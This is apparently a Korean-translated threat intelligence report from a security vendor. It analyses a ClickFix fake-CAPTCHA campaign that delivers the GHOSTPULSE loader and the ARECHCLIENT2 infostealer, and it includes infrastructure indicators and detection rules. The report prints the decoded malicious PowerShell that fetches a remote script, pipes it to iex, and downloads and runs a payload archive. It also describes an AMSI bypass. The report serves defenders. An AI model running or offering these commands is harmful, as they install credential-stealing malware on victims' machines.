서문
엘라스틱 보안 연구소는 클릭픽스 기법이 소셜 엔지니어링 전술을 통해 다양한 멀웨어를 전달하는 다단계 캠페인에서 인기를 얻고 있는 것을 관찰했습니다.
당사의 위협 인텔리전스에 따르면 ClickFix(처음 관찰된 기법)를 주요 초기 액세스 벡터로 활용하는 활동이 크게 급증한 것으로 나타났습니다. 이 소셜 엔지니어링 기법은 사용자를 속여 악성 PowerShell을 복사 및 붙여넣기하도록 유도하여 악성 코드가 실행되도록 합니다. 저희는 작년부터 원격 분석을 통해 새로운 버전의 GHOSTPULSE 로더 배포로 이어진 사례를 포함하여 사용 현황을 추적해왔습니다. 이로 인해 2019 에서 처음 관찰되었지만 현재 인기가 급상승하고 있는 LUMMA 및 ARECHCLIENT2와 같은 멀웨어 및 인포스틸러를 사용하여 광범위한 사용자를 대상으로 하는 캠페인이 등장했습니다.
이 게시물에서는 최근 발생한 ClickFix 캠페인의 구성 요소, 사용된 기술 및 궁극적으로 전달되는 멀웨어에 대한 심층적인 분석을 제공합니다.
핵심 사항
- ClickFix: 여전히 매우 효과적이고 널리 사용되는 초기 액세스 방법입니다.
- 호스트펄스: 다단계 페이로드 로더로 계속 널리 사용되고 있으며, 새로운 모듈과 향상된 회피 기술로 지속적으로 개발되고 있습니다. 특히 초기 구성은 암호화된 파일로 제공됩니다.
- 아레치클라이언트2(섹토프랫): 2025년 내내 악성 활동이 상당히 증가했습니다.
초기 훅: ClickFix의 소셜 엔지니어링 해체하기
모든 성공적인 다단계 공격은 발판에서 시작되며, 최근 많은 캠페인에서 ClickFix는 그 초기 단계를 충족시켰습니다. ClickFix는 인간의 심리를 활용하여 무해해 보이는 사용자 상호 작용을 타협을 위한 발판으로 전환합니다.
클릭픽스의 핵심은 사용자가 실수로 시스템에 악성 코드를 실행하도록 조작하도록 설계된 사회 공학 기법입니다. 일반적인 온라인 행동과 심리적 경향을 이용하여 사용자에게 브라우저 업데이트, 시스템 오류 또는 캡차 인증으로 위장한 기만적인 메시지를 표시합니다. 이 수법은 간단하지만 매우 효과적입니다. 직접 다운로드하는 대신 무해해 보이는 "수정" (악성 PowerShell 명령)을 복사하여 운영 체제의 실행 대화 상자에 직접 붙여넣도록 사용자에게 지시합니다. 사용자가 프로세스를 시작하기 때문에 이러한 자발적인 행동은 기존의 많은 경계 방어를 우회하는 것처럼 보입니다.
ClickFix는 2024년 3월에 위협 환경에 처음 등장했지만, 빠르게 주목을 받으며 2024 전체에서 폭발적으로 확산되었고 2025년에도 공격적인 상승세를 이어가고 있습니다. 사용자가 무의식적으로 보안 확인을 클릭하는 무의식적 습관인 "확인 피로(" )를 악용하는 것이 효과적입니다. 익숙해 보이는 캡차나 긴급한 "수정(" ) 버튼을 마주하면, 많은 사용자가 습관에 길들여져 기본 요청을 면밀히 검토하지 않고 그냥 따르기만 합니다. 따라서 ClickFix는 초기 방어 체계를 뚫는 데 성공률이 높기 때문에 광범위한 위협 행위자들이 선호하는 매우 강력한 초기 액세스 벡터가 되었습니다.
최근 Elastic Security의 EDDIESTEALER에 대한 연구는 악성코드 배포를 용이하게 하는 ClickFix의 효능에 대한 또 다른 구체적인 예를 제공하며, 위협 환경에서의 다용도성과 광범위한 채택을 더욱 강조합니다.
Elastic의 내부 원격 분석은 이러한 추세를 확증하며, 특히 2025년 1분기에 관찰된 환경 전반에서 ClickFix 관련 경보가 상당한 양으로 증가했음을 보여줍니다. 전 분기에 비해 공격 시도가 증가했으며, 주로 RAT 및 InfoStealers와 같은 대량 감염 멀웨어의 배포에 초점을 맞추고 있는 것으로 나타났습니다.
클릭픽스 캠페인의 아크클리언트2로의 여정
클릭픽스 기법은 종종 대규모 다단계 공격의 초기 단계로 사용됩니다. 최근 이러한 진행 상황을 명확하게 보여주는 캠페인을 분석했습니다. 이 작업은 사용자를 속여 감염 프로세스를 시작하도록 유도하는 ClickFix 미끼로 시작됩니다. 초기 액세스 권한을 얻은 후, 캠페인은 업데이트된 버전의 GHOSPULSE 로더( 하이잭로더, 데이터로더라고도 함)를 배포합니다. 그런 다음 이 로더는 중간 .NET 로더를 가져옵니다. 이 추가 단계는 메모리에 직접 로드되는 최종 페이로드인 ARECHCLIENT2(SECTOPRAT) 샘플을 전달하는 역할을 담당합니다. 이 특정 공격 체인은 공격자가 어떻게 소셜 엔지니어링과 숨겨진 로더 기능 및 여러 실행 계층을 결합하여 데이터를 훔치고 궁극적으로 원격 제어권을 확보하는지를 보여줍니다.
에 대한 원격 분석을 통해 이 캠페인을 정확히 관찰하여 실제 캠페인의 실행과 구성 요소의 순서를 직접 살펴볼 수 있었습니다.
감염에 대한 기술적 분석
감염 사슬은 Cloudflare 안티 DDoS 캡차 확인을 모방한 피싱 페이지로 시작됩니다.
동일한 초기 페이로드를 제공하는 두 개의 인프라(둘 다 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ 및 https://clients[.]contology[.]com/captcha/ 로 리졸브되는 것을 확인했습니다.
이 페이지에서 사용자 상호작용을 하면 실행이 시작됩니다. 이 캠페인의 멀웨어 로더는 GHOSPULSE입니다. Elastic 보안 연구소는 이 로더를 면밀히 추적해 왔으며, 이전연구(2023년과 2024년) 에서 초기 기능에 대해 자세히 살펴본 바 있습니다.
이 웹 페이지는 HTML 코드와 JavaScript를 생성하는 고도로 난독화된 JavaScript 스크립트로, PowerShell 명령을 클립보드에 복사합니다.
브라우저에서 런타임 HTML 코드를 검사하면 페이지의 프런트엔드는 볼 수 있지만 확인란을 클릭한 후 실행되는 스크립트는 볼 수 없습니다. Verify you are human.
간단한 해결책은 디버거에서 실행하여 실행 중에 정보를 검색하는 것입니다. 두 번째 JS 코드는 난독화되어 있지만 두 가지 흥미로운 함수를 쉽게 식별할 수 있습니다. 첫 번째 함수인 runClickedCheckboxEffects 은 https://api.ipify[.]org?format=json, 을 쿼리하여 컴퓨터의 공용 IP 주소를 검색한 다음, 해당 IP 주소를 공격자의 인프라( https://koonenmagaziner[.]click/counter/<IP_address>, )로 전송하여 감염을 기록합니다.
두 번째 함수는 base64로 인코딩된 PowerShell 명령을 클립보드에 복사합니다.
base64로 디코딩된 경우 다음과 같습니다.
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iex실행하면 다음 PowerShell 스크립트를 가져옵니다:
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"이 캠페인에서 관찰된 감염 프로세스는 다음과 같이 호스팅펄스의 배포를 포함합니다: 사용자가 ClickFix가 복사한 PowerShell 명령을 실행하면 초기 스크립트가 추가 명령을 가져와 실행합니다. 이러한 PowerShell 명령은 원격 위치에서 ZIP 파일(ComponentStyle.zip)을 다운로드한 다음 피해자의 시스템에 있는 임시 디렉터리에 압축을 풉니다.
추출된 내용에는 GHOSPULSE용 구성 요소, 특히 양성 실행 파일(Crysta_X64.exe)과 악성 동적 링크 라이브러리(DllXDownloadManager.dll)가 포함되어 있습니다. 이 설정은 합법적인 실행 파일이 악성 DLL을 로드하는 기술인 DLL 사이드로드를 활용합니다. 파일(Heeschamjet.rc)은 다음 단계의 페이로드가 암호화된 형식으로 포함된 IDAT 파일입니다.
와 로더가 2 및 구성 구조를 가져오기 위해 암호화하여 사용하는 Shonomteak.bxi, 파일입니다.
GHOSTPULSE
스테이지 1
호스트펄스는 2023년에 발견된 멀웨어입니다. Elastic의 2024 연구 블로그 게시물에 자세히 설명된 대로 PNG의 픽셀에 페이로드를 임베드하여 이미지에 암호화된 페이로드를 저장하는 새로운 방법과 Zscaler 연구의 새로운 모듈 등 수많은 업데이트가 지속적으로 이루어지고 있습니다.
이 캠페인에 사용된 멀웨어는 Shonomteak.bxi 라는 이름의 추가 암호화된 파일과 함께 발송되었습니다. 로더의 1 단계에서 파일 자체에 저장된 값으로 DWORD 추가 연산을 사용하여 파일을 복호화합니다.
그런 다음 멀웨어는 해독된 파일 Shonomteak.bxi에서 2 코드를 추출하고 LibraryLoadA 함수를 사용하여 로드된 라이브러리에 삽입합니다. 라이브러리 이름은 동일한 복호화된 파일에 저장되며, 저희의 경우 vssapi.dll 입니다.
그런 다음 IDAT PNG 파일의 파일명이 포함된 구조 매개변수, 해독된 Shonomteak.bxi, 안에 있던 단계 2 구성, True 로 설정된 부울 필드 b_detect_process 를 사용하여 단계 2 함수가 호출됩니다.
스테이지 2
부울 필드 b_detect_process 가 True로 설정되면 악성 코드는 프로세스 목록을 확인하여 실행 중인 프로세스가 있는지 확인하는 함수를 실행합니다. 프로세스가 감지되면 실행이 5 초 지연됩니다.
이전 샘플에서는 구성을 바이너리에 직접 하드코딩한 GHOSTPULSE를 분석했습니다. 반면 이 샘플에는 멀웨어가 제대로 작동하는 데 필요한 모든 정보가 Shonomteak.bxi, 에 저장되어 있습니다:
- DLL 이름 및 Windows API에 대한 해시
- IDAT 태그: PNG 파일에서 암호화된 데이터의 시작 부분을 찾는 데 사용됩니다.
- IDAT 문자열: 간단히 "IDAT"
- 스캔할 프로세스 해시
호스트펄스에 대한 최종 생각
호스트펄스는 여러 차례 업데이트되었습니다. 2024년에 발견된 새로운 방법인 픽셀을 사용하여 페이로드를 저장하는 방법 대신 IDAT 헤더 방법을 사용하여 암호화된 페이로드를 저장하는 것은 이 제품군의 빌더가 새로운 샘플을 컴파일하기 위해 두 가지 옵션을 모두 유지했음을 나타낼 수 있습니다.
구성 추출기는 두 가지 방법을 모두 사용하여 페이로드 추출을 수행하며 샘플의 대량 분석에 사용할 수 있습니다. 업데이트된 도구는 실험실 릴리즈 리포지토리에서 찾을 수 있습니다.
ARECHCLIENT2
2025년에는 ARECHCLIENT2(SectopRAT)와 관련된 활동이 눈에 띄게 증가하는 것이 관찰되었습니다. 2019년 11월에 처음 발견되어 정보 탈취 기능으로 알려진 이 심하게 난독화된 .NET 원격 액세스 도구는 현재 Clickfix 사회 공학 기법을 통해 GHOSTPULSE에 의해 배포되고 있습니다. 이전 연구에서는 2023년경 ARECHCLIENT2를 활용한 GHOSPULSE의 초기 배포를 문서화했습니다.
새로 생성된 프로세스에서 GHOSTPULSE가 배포하는 페이로드는 x86 네이티브 .NET 로더이며, 이 로더는 차례로 ARECHCLIENT2를 로드합니다.
로더는 3 단계를 거칩니다:
- AMSI 패치 적용
- 페이로드 추출 및 복호화
- CLR을 로드한 다음 ARECHCLIENT2를 반사적으로 로드합니다.
흥미로운 점은 디버깅 목적의 오류 처리가 MessageBoxA API를 사용하는 메시지 상자의 형태로 여전히 존재한다는 점입니다. 예를 들어 .tls 섹션을 찾지 못하면 "D1" 문자열이 포함된 오류 메시지 상자가 표시됩니다.
다음은 모든 오류 메시지와 그 설명이 나와 있는 표입니다:
| Message | 설명 |
|---|---|
| F1 | LoadLibraryExW 후킹 실패 |
| F2 | AMSI 패치가 실패했습니다. |
| D1 | .tls 섹션을 찾을 수 없습니다. |
| W2 | CLR 로드에 실패했습니다. |
멀웨어는 LoadLibraryExW API에 후크를 설정합니다. 이 훅은 amsi.dll 가 로드될 때까지 기다린 다음 AmsiScanBuffer 0 에 또 다른 훅을 설정하여 AMSI를 효과적으로 우회합니다.
그 후 로더는 PE 헤더를 파싱하여 메모리에서 .tls 섹션에 대한 포인터를 가져옵니다. 이 섹션의 첫 번째 0x40 바이트는 XOR 키 역할을 하고 나머지 바이트는 로더가 복호화하는 암호화된 ARECHCLIENT2 샘플을 포함합니다.
마지막으로, ARECHCLIENT2를 반사적으로 로드하기 전에 CLRCreateInstance Windows API를 사용하여 메모리에 .NET 공용 언어 런타임(CLR)을 로드합니다. 다음은 수행 방법의 예입니다 .
ARECHCLIENT2는 강력한 원격 액세스 트로이 목마이자 인포스틸러로, 광범위한 민감한 사용자 데이터와 시스템 정보를 표적으로 삼도록 설계되었습니다. 멀웨어의 핵심 목표는 주로 다음과 같습니다:
- 자격 증명 및 금융 도용: ARECHCLIENT2는 암호화폐 지갑, 브라우저에 저장된 비밀번호, 쿠키 및 자동 완성 데이터를 명시적으로 표적으로 삼습니다. 또한 FTP, VPN, 텔레그램, 디스코드, 스팀의 자격 증명을 노립니다.
- 시스템 프로파일링 및 정찰: ARECHCLIENT2는 운영 체제 버전, 하드웨어 정보, IP 주소, 컴퓨터 이름, 지리적 위치(도시, 국가, 시간대) 등 광범위한 시스템 세부 정보를 수집합니다.
- 명령 실행: ARECHCLIENT2는 명령 및 제어(C2) 서버로부터 명령을 수신하고 실행하여 공격자에게 감염된 시스템을 원격으로 제어할 수 있는 권한을 부여합니다.
ARECHCLIENT2 악성코드는 바이너리에 암호화된 문자열로 하드코딩된 C2 144.172.97[.]2, 에 연결하고, 또한 하드코딩된 페이스트빈 링크 https://pastebin[.]com/raw/Wg8DHh2x 에서 보조 C2 (143.110.230[.]167) IP를 검색합니다.
인프라 분석
악성 캡차 페이지는 다음 IP 주소 50.57.243[.]90 를 가리키는 URI /captcha 및 /Client 아래 clients.dealeronlinemarketing[.]com 및 clients.contology[.]com 두 개의 도메인에서 호스팅되었습니다.
두 법인 모두 오랜 운영 이력을 가진 디지털 광고 대행사와 연결되어 있는 것으로 확인되었습니다. 추가 조사 결과, 이 회사는 광고 목적으로 PDF 및 양식을 포함한 다양한 콘텐츠를 호스팅하기 위해 클라이언트 하위 도메인을 지속적으로 활용해 온 것으로 밝혀졌습니다.
공격자는 50.57.243[.]90 서버를 손상시켰을 가능성이 높으며, 회사의 기존 인프라와 광고 도달 범위를 악용하여 광범위한 악성 활동을 촉진하는 데 활용하고 있는 것으로 평가합니다.
공격 체인의 더 아래쪽에서 ARECHCLIENT2 C2 IP(143.110.230[.]167 및 144.172.97[.]2)를 분석한 결과 추가적인 캠페인 인프라가 발견되었습니다. 두 서버는 서로 다른 자율 시스템인 AS14061과 AS14956에서 호스팅됩니다.
공유 배너 해시( HOST-BANNER_0_HASH웹 서버 응답 배너의 해시값인 @ValidinLLC의)를 피벗하여 120 지난 7개월 동안 다양한 자율 시스템에서 고유 서버를 발견했습니다. 이 120개 중 19 은 이전에 여러 다른 공급업체에서 ' Maltrail 리포지토리에 문서화된 대로 Sectop RAT" (일명 ARECHCLIENT2)'로 분류한 적이 있습니다.
최근 발생(6월 이후 첫 발생 1, 2025)에 대한 집중 검증을 VirusTotal에 대해 수행한 결과 커뮤니티 회원들은 이전에 모든 13 을 Sectop RAT C2 로 분류한 것으로 나타났습니다.
이 모든 서버의 구성은 비슷합니다:
- 정식 Linux 실행
- SSH 켜기
22 - 알 수 없는 TCP 켜짐
443 8080, 그리고9000(C2 포트)의 HTTP
9000 포트의 서비스에는 Windows 서버 헤더가 있는 반면, SSH 및 NGINX HTTP 서비스는 모두 운영 체제로 우분투를 지정합니다. 이는 일회용 프런트엔드 리디렉터를 유지하여 실제 서버를 보호하기 위해 C2의 리버스 프록시를 제안합니다.
arechclient2 ioc:
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
이 캠페인은 현재 진행 중이며, 지난 7개월 동안 빠른 속도로 인프라가 구축되고 철거되고 있습니다. 게시 시점을 기준으로 다음 C2 노드가 여전히 활성화되어 있습니다:
| Value | First Seen | 마지막으로 본 |
|---|---|---|
66.63.187.22 | 2025-06-15 | 2025-06-15 |
45.94.47.164 | 2025-06-02 | 2025-06-15 |
84.200.17.129 | 2025-06-04 | 2025-06-15 |
82.117.255.225 | 2025-03-14 | 2025-06-15 |
45.77.154.115 | 2025-06-05 | 2025-06-15 |
144.172.94.120 | 2025-05-20 | 2025-06-15 |
79.124.62.10 | 2025-05-15 | 2025-06-15 |
82.117.242.178 | 2025-03-14 | 2025-06-15 |
195.82.147.132 | 2025-04-10 | 2025-06-15 |
62.60.247.154 | 2025-05-18 | 2025-06-15 |
91.199.163.74 | 2025-04-03 | 2025-06-15 |
172.86.72.81 | 2025-03-13 | 2025-06-15 |
107.189.24.67 | 2025-06-02 | 2025-06-15 |
143.110.230.167 | 2025-06-08 | 2025-06-15 |
185.156.72.80 | 2025-05-15 | 2025-06-15 |
85.158.110.179 | 2025-05-11 | 2025-06-15 |
144.172.101.228 | 2025-05-13 | 2025-06-15 |
192.124.178.244 | 2025-06-01 | 2025-06-15 |
107.189.18.56 | 2025-04-27 | 2025-06-15 |
194.87.29.62 | 2025-05-18 | 2025-06-15 |
185.156.72.63 | 2025-06-12 | 2025-06-12 |
193.149.176.31 | 2025-06-08 | 2025-06-12 |
45.141.87.249 | 2025-06-12 | 2025-06-12 |
176.126.163.56 | 2025-05-06 | 2025-06-12 |
185.156.72.71 | 2025-05-15 | 2025-06-12 |
91.184.242.37 | 2025-05-15 | 2025-06-12 |
45.141.86.159 | 2025-05-15 | 2025-06-12 |
67.220.72.124 | 2025-06-05 | 2025-06-12 |
45.118.248.29 | 2025-01-28 | 2025-06-12 |
172.105.148.233 | 2025-06-03 | 2025-06-10 |
194.26.27.10 | 2025-05-06 | 2025-06-10 |
45.141.87.212 | 2025-06-08 | 2025-06-08 |
45.141.86.149 | 2025-05-15 | 2025-06-08 |
172.235.190.176 | 2025-06-08 | 2025-06-08 |
45.141.86.82 | 2024-12-13 | 2025-06-08 |
45.141.87.7 | 2025-05-13 | 2025-06-06 |
185.125.50.140 | 2025-04-06 | 2025-06-03 |
결론
이 다단계 사이버 캠페인은 초기 액세스를 위해 ClickFix 소셜 엔지니어링을 효과적으로 활용하고, 중간 .NET 로더를 전달하기 위해 GHOSTPULSE 로더를 배포하여 궁극적으로 메모리 상주 ARECHCLIENT2 페이로드에서 정점을 찍습니다. 이 계층화된 공격 체인은 광범위한 자격 증명, 금융 및 시스템 데이터를 수집하는 동시에 공격자에게 손상된 시스템에 대한 원격 제어 기능을 부여합니다.
MITRE ATT&CK
Elastic은 MITRE ATT& CK 프레임워크를 사용하여 지능형 지속적 위협이 기업 네트워크에 대해 사용하는 일반적인 전술, 기술 및 절차를 문서화합니다.
전술
전술은 기술 또는 하위 기술의 이유를 나타냅니다. 이는 적의 전술적 목표, 즉 행동을 수행하는 이유입니다.
기술
기술은 공격자가 행동을 수행하여 전술적 목표를 달성하는 방법을 나타냅니다.
멀웨어] 탐지
탐지
Elastic Defend는 다음과 같은 행동 보호 규칙으로 이 위협을 탐지합니다:
- Windows 실행을 통한 의심스러운 명령 셸 실행
- 의심스러운 최상위 도메인에 대한 DNS 쿼리
- 서명된 바이너리 프록시로 작성된 파일의 라이브러리 로드
- 서명된 바이너리 프록시를 통한 웹서비스 연결
- 잠재적 브라우저 정보 검색
YARA
관찰
이 연구에서는 다음과 같은 관찰 가능성에 대해 논의했습니다.
| 관측 가능합니다. | 유형 | 이름 | 참조 |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | 도메인 | 캡차 하위 도메인 | |
clients.contology[.]com | 도메인 | 캡차 하위 도메인 | |
koonenmagaziner[.]click | 도메인 | ||
50.57.243[.]90 | IPv4-addr | clients.dealeronlinemarketing[.]com & clients.contology[.]com IP 주소 | |
144.172.97[.]2 | IPv4-addr | ARECHCLIENT2 C&C 서버 | |
143.110.230[.]167 | IPv4-addr | ARECHCLIENT2 C&C 서버 | |
pastebin[.]com/raw/Wg8DHh2x | IPv4-addr | ARECHCLIENT2 C&C 서버 IP 포함 | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | PNG 호스트 펄스 |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | 닷넷 로더 | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | ARECHCLIENT2 |
참고 자료
위의 조사에서 참조한 내용은 다음과 같습니다: